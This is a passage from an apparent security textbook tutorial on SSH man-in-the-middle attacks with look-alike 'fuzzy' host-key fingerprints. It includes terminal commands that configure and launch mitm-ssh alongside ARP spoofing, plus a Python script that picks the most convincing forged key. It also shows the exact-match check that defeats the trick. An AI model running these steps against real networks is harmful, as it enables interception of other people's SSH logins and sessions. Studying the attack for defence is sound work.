1024 ba:06:7c:d2:15:a2:d3:0d:bf:f0:d4:5d:c6:10:22:90 /tmp/ssh-rsa04.pub
1024 ba:06:3f:22:1b:44:7b:db:41:27:54:ac:4a:10:29:e0 /tmp/ssh-rsa05.pub
1024 ba:06:78:dc:be:a6:43:15:eb:3f:ac:92:e5:8e:c9:50 /tmp/ssh-rsa06.pub
1024 ba:06:7f:da:ae:61:58:aa:eb:55:d0:0c:f6:13:61:30 /tmp/ssh-rsa07.pub
1024 ba:06:7d:e8:94:ad:eb:95:d2:c5:1e:6d:19:53:59:a0 /tmp/ssh-rsa08.pub
1024 ba:06:74:a2:c2:8b:a4:92:e1:e1:75:f5:19:15:60:a0 /tmp/ssh-rsa09.pub
reader@hacking:~ $ ssh-keygen -l -f ./loki.hostkey
1024 ba:06:7f:d2:b9:74:a8:0a:13:cb:a2:f7:e0:10:59:a0 192.168.42.72
reader@hacking:~ $
Of the 10 generated key pairs, the one whose fingerprint looks most like the
original is picked by eye. In this case, ssh-rsa02.pub, shown in bold in the
original listing, was chosen. Whichever pair is chosen, though, its fingerprint
will look far more like the original than that of a randomly generated key.
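The selection step described above can be automated instead of done by eye. The following is an added example, not code from the book: it parses `ssh-keygen -l` output lines like the ones listed above, scores each candidate against the real host key's fingerprint, and picks the best. The scoring rule (longest matching run at the start plus longest matching run at the end, with the total number of matching hex digits as a tiebreaker) is an assumption about what "looks similar" means to a person glancing at a fingerprint; the book's author chose by eye. The six candidate lines are the ones visible on this page, the `ssh-rsa YWJj` key line in the usage is constructed, and the function names are mine. `fingerprints_match` is the check a client should actually perform: a full-string comparison, which a fuzzy fingerprint fails even though it fools the eye.

```python
"""Pick the fuzzy-fingerprint key from an ssh-keygen listing (added example)."""
import base64
import hashlib
import hmac

# Fingerprint of the real host key for 192.168.42.72, as listed on the page.
TARGET = "ba:06:7f:d2:b9:74:a8:0a:13:cb:a2:f7:e0:10:59:a0"

# Constructed input: the `ssh-keygen -l -f` lines visible on the page for
# /tmp/ssh-rsa04.pub .. /tmp/ssh-rsa09.pub. In practice this is the output of
# running ssh-keygen -l over every generated .pub file.
KEYGEN_LISTING = """\
1024 ba:06:7c:d2:15:a2:d3:0d:bf:f0:d4:5d:c6:10:22:90 /tmp/ssh-rsa04.pub
1024 ba:06:3f:22:1b:44:7b:db:41:27:54:ac:4a:10:29:e0 /tmp/ssh-rsa05.pub
1024 ba:06:78:dc:be:a6:43:15:eb:3f:ac:92:e5:8e:c9:50 /tmp/ssh-rsa06.pub
1024 ba:06:7f:da:ae:61:58:aa:eb:55:d0:0c:f6:13:61:30 /tmp/ssh-rsa07.pub
1024 ba:06:7d:e8:94:ad:eb:95:d2:c5:1e:6d:19:53:59:a0 /tmp/ssh-rsa08.pub
1024 ba:06:74:a2:c2:8b:a4:92:e1:e1:75:f5:19:15:60:a0 /tmp/ssh-rsa09.pub
"""


def md5_fingerprint(blob: bytes) -> str:
    """Colon-separated MD5 fingerprint of a raw key blob, as older OpenSSH
    clients print it (the ba:06:... format shown on the page)."""
    digest = hashlib.md5(blob).hexdigest()
    return ":".join(digest[i:i + 2] for i in range(0, len(digest), 2))


def pubkey_blob(line: str) -> bytes:
    """Decode the base64 key blob from an OpenSSH public key line
    ('ssh-rsa AAAA... comment')."""
    parts = line.split()
    if len(parts) < 2:
        raise ValueError("not an OpenSSH public key line")
    return base64.b64decode(parts[1])


def parse_keygen_listing(text: str) -> dict:
    """Map key file path -> fingerprint from `ssh-keygen -l` output lines
    of the form '<bits> <fingerprint> <path>'."""
    keys = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 3:
            keys[parts[2]] = parts[1]
    return keys


def _nibbles(fp: str) -> str:
    return fp.replace(":", "").lower()


def similarity(target: str, candidate: str) -> tuple:
    """Score how alike two fingerprints look at a glance.
    Assumed weighting (not from the book): the longest matching run at the
    start plus the longest matching run at the end counts first, because
    those are the parts people actually read; the total number of matching
    hex digits only breaks ties."""
    t, c = _nibbles(target), _nibbles(candidate)
    if len(t) != len(c):
        raise ValueError("fingerprints differ in length")
    prefix = 0
    while prefix < len(t) and t[prefix] == c[prefix]:
        prefix += 1
    suffix = 0
    while suffix < len(t) - prefix and t[-1 - suffix] == c[-1 - suffix]:
        suffix += 1
    total = sum(a == b for a, b in zip(t, c))
    return (prefix + suffix, total)


def best_key_path(target: str, listing: str) -> str:
    """Path of the generated key whose fingerprint scores highest."""
    keys = parse_keygen_listing(listing)
    return max(keys, key=lambda path: similarity(target, keys[path]))


def fingerprints_match(expected: str, presented: str) -> bool:
    """The defender's check: compare the whole fingerprint, never a glance.
    A fuzzy fingerprint fails this even though it fools the eye."""
    return hmac.compare_digest(_nibbles(expected), _nibbles(presented))


if __name__ == "__main__":
    keys = parse_keygen_listing(KEYGEN_LISTING)
    best = best_key_path(TARGET, KEYGEN_LISTING)
    print("target ", TARGET)
    print("chosen ", keys[best], best, similarity(TARGET, keys[best]))
    print("exact match?", fingerprints_match(TARGET, keys[best]))
    # Constructed key line: base64 'YWJj' decodes to b'abc'.
    print("fingerprint of constructed blob:",
          md5_fingerprint(pubkey_blob("ssh-rsa YWJj test")))
```

With this weighting the script prefers ssh-rsa08.pub, whose fingerprint shares the first five hex digits and the last four with the real key; the book's author, choosing by eye, preferred ssh-rsa02.pub, which is not shown on this page. Either way the point stands: the winner differs from the real fingerprint in most of its middle bytes, and only an exact comparison such as `fingerprints_match` (or a known_hosts entry) catches it.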
This new key can be used with mitm-ssh to make the attack even more
effective. The location of the host key is specified in the configuration
file, so using the new key is simply a matter of adding a HostKey line to
/usr/local/etc/mitm-ssh_config, as shown below. The HostKey line points at
the private key, /tmp/ssh-rsa02, not at the .pub file that ssh-keygen
listed. Since we need to remove the Protocol 1 line we added earlier, the
command below simply overwrites the configuration file.
reader@hacking:~ $ echo "HostKey /tmp/ssh-rsa02" > /usr/local/etc/mitm-ssh_config
reader@hacking:~ $ mitm-ssh 192.168.42.72 -v -n -p 2222
Using static route to 192.168.42.72:22
Disabling protocol version 1. Could not load host key
SSH MITM Server listening on 0.0.0.0 port 2222.
In another terminal window, arpspoof is running to redirect the traffic
to mitm-ssh, which will present the new host key with the fuzzy fingerprint.
The output below compares what a client sees when connecting directly to
the host with what it sees when connecting through the MitM.
Normal Connection
iz@tetsuo:~ $ ssh jose@192.168.42.72
The authenticity of host '192.168.42.72 (192.168.42.72)' can't be established.
RSA key fingerprint is ba:06:7f:d2:b9:74:a8:0a:13:cb:a2:f7:e0:10:59:a0.
Are you sure you want to continue connecting (yes/no)?
MitM-Attacked Connection
iz@tetsuo:~ $ ssh jose@192.168.42.72
The authenticity of host '192.168.42.72 (192.168.42.72)' can't be established.
RSA key fingerprint is ba:06:7e:b2:64:13:cf:0f:a4:69:17:d0:60:62:69:a0.
Are you sure you want to continue connecting (yes/no)?
Can you immediately tell the difference? The two fingerprints agree in the
first two and a half bytes and in the last byte, which is about as much as
most people check, so these fingerprints look similar enough to trick most
people into simply accepting the connection.